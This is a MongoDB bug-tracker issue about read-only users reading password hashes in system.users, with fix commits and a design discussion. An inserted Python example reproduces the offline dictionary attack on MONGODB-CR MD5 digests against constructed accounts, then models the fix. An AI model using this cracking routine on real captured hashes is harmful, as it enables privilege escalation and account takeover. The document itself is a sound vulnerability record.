[SERVER-4692] Read-only users should be denied access to system.users collection Created: 16/Jan/12  Updated: 30/Oct/15  Resolved: 09/Mar/12

Status: Closed
Project: Core Server
Component/s: Security
Affects Version/s: 2.0.2
Fix Version/s: 2.1.1

Type: Bug Priority: Critical - P2
Reporter: Nathaniel McCallum Assignee: Mathias Stearn
Resolution: Done Votes: 0
Labels: security
Remaining Estimate: Not Specified
Time Spent: Not Specified
Original Estimate: Not Specified

Issue Links:
Related
related to SERVER-6031 read only user can get write priority Closed
is related to SERVER-7604 On MongoS read-only users should be d... Closed
is related to SERVER-9009 mongodump fails when run by a read-on... Closed
is related to TOOLS-134 Mongodump and mongoexport should skip... Closed
Backwards Compatibility: Minor Change
Operating System: ALL
Participants:

 Description   

Original Title: system.users collection placement allows offline dictionary attack for read-only users

When using authentication with MongoDB, users with read-write permissions have their password hashes stored in system.users. Read-only users can read these hashes. This permits read-only users to read the password hashes of read/write users and perform an offline dictionary attack in order to escalate their privileges.
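Added example, not part of the report or of the MongoDB code base: it reproduces the escalation path the description outlines and the check the fix commit in the comments describes. What it relies on is the MONGODB-CR digest format used by 2.0-era system.users documents, pwd = hex(MD5(user + ":mongo:" + password)), which is unsalted and cheap to compute per guess. The system.users dump, the wordlist and the usernames are constructed here; authorize_read is a simplified model of the 2.1.1 rule (read-only users denied reads of system.users), not the server's actual authorization code.

```python
import hashlib
from typing import Dict, Iterable, List, Optional


def mongodb_cr_pwd(user: str, password: str) -> str:
    """Stored 'pwd' field of a 2.0-era system.users document (MONGODB-CR):
    hex(MD5(user + ":mongo:" + password)). One fast, unsalted MD5 per
    candidate is what makes the offline dictionary attack cheap."""
    return hashlib.md5(f"{user}:mongo:{password}".encode()).hexdigest()


# Constructed sample of what `db.system.users.find()` handed back to a
# read-only user on 2.0.x. Usernames and passwords are made up for this example.
SYSTEM_USERS: List[Dict] = [
    {"user": "ro_reporter", "readOnly": True,
     "pwd": mongodb_cr_pwd("ro_reporter", "r3ad-0nly!")},
    {"user": "app_rw", "readOnly": False,
     "pwd": mongodb_cr_pwd("app_rw", "summer2011")},
]

# Constructed wordlist; a real attack would use a large dictionary plus rules.
WORDLIST: List[str] = ["password", "123456", "mongodb", "summer2011", "letmein"]


def crack(entry: Dict, wordlist: Iterable[str]) -> Optional[str]:
    """Recompute the digest for each candidate; the username is the only
    per-user input, so there is nothing else to guess."""
    for cand in wordlist:
        if mongodb_cr_pwd(entry["user"], cand) == entry["pwd"]:
            return cand
    return None


def offline_attack(dump: List[Dict], wordlist: Iterable[str]) -> Dict[str, str]:
    """Return {user: recovered_password} for the read-write accounts only:
    the attacker already holds a read-only credential and wants escalation."""
    found: Dict[str, str] = {}
    for doc in dump:
        if doc.get("readOnly"):
            continue
        pw = crack(doc, wordlist)
        if pw is not None:
            found[doc["user"]] = pw
    return found


# Fix side. Hypothetical model of the rule the 2.1.1 commit describes:
# a read-only user may not read <db>.system.users at all, so the dump that
# feeds offline_attack() is never obtained.
def authorize_read(readonly_user: bool, namespace: str) -> bool:
    _db, _, coll = namespace.partition(".")
    if readonly_user and coll == "system.users":
        return False
    return True


def read_collection(readonly_user: bool, namespace: str, store: List[Dict]) -> List[Dict]:
    """Simulated query path: apply the check before returning any documents."""
    if not authorize_read(readonly_user, namespace):
        raise PermissionError(f"unauthorized: read-only user cannot read {namespace}")
    return store


if __name__ == "__main__":
    # Before the fix: the read-only user reads the collection and cracks offline.
    print(offline_attack(SYSTEM_USERS, WORDLIST))
    # After the fix: the same read is refused.
    try:
        read_collection(True, "test.system.users", SYSTEM_USERS)
    except PermissionError as e:
        print(e)
```

Note what the check does not cover, which is the point the later comments raise: a user who held read/write access while they could still read system.users keeps any copy they took, so revoking that user does not undo an offline attack against hashes captured earlier.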



 Comments   
Comment by auto [ 09/Mar/12 ]

Author: Mathias Stearn (RedBeard0531) <redbeard0531@gmail.com>

Message: Don't allow read-only users to read from system.users collection SERVER-4692
Branch: master
https://github.com/mongodb/mongo/commit/1afdf32715eeaac5c287b25db7ea016ceaa44380

Comment by auto [ 09/Mar/12 ]

Author: Mathias Stearn (RedBeard0531) <redbeard0531@gmail.com>

Message: fix broken bits in reenabled test

Prep for SERVER-4692
Uncovered SERVER-5228
Branch: master
https://github.com/mongodb/mongo/commit/d06ef3bd8e857fbe20d671a366f1696d8c3b2a27

Comment by auto [ 09/Mar/12 ]

Author: Mathias Stearn (RedBeard0531) <redbeard0531@gmail.com>

Message: Features cmd no longer has readlock field

Prep for SERVER-4692
readlock field removed in commit 35031d43d717dda19b0b62ab6f97af275717ad30
Branch: master
https://github.com/mongodb/mongo/commit/5cf72997e3bb116d90f7d9969c6f6b4028a5f8f0

Comment by Eliot Horowitz (Inactive) [ 17/Jan/12 ]

The admin database is for people with server level admin access.

Comment by Nathaniel McCallum [ 17/Jan/12 ]

If you don't move it, how do you plan on restricting/granting permission to create new databases?

Comment by Eliot Horowitz (Inactive) [ 17/Jan/12 ]

system.indexes will certainly not change.

system.users will probably not move - but we are likely to add an "admin" role which would have access to system.users

Comment by Nathaniel McCallum [ 17/Jan/12 ]

While blocking read-only users from reading system.users does solve this security problem, it doesn't solve the case where read/write users can keep backups of passwords for offline dictionary attacks when their privileges are revoked. This is, I think, just as important.

It would be best to move system.users (and system.indexes while we're at it) to a separate database. This entirely separates the admin concern for the data storage and retrieval concern.

Comment by Eliot Horowitz (Inactive) [ 17/Jan/12 ]

read only users shouldn't be able to access system.users

Generated at Thu Feb 08 03:06:42 UTC 2024 using Jira 9.7.1#970001-sha1:2222b88b221c4928ef0de3161136cc90c8356a66.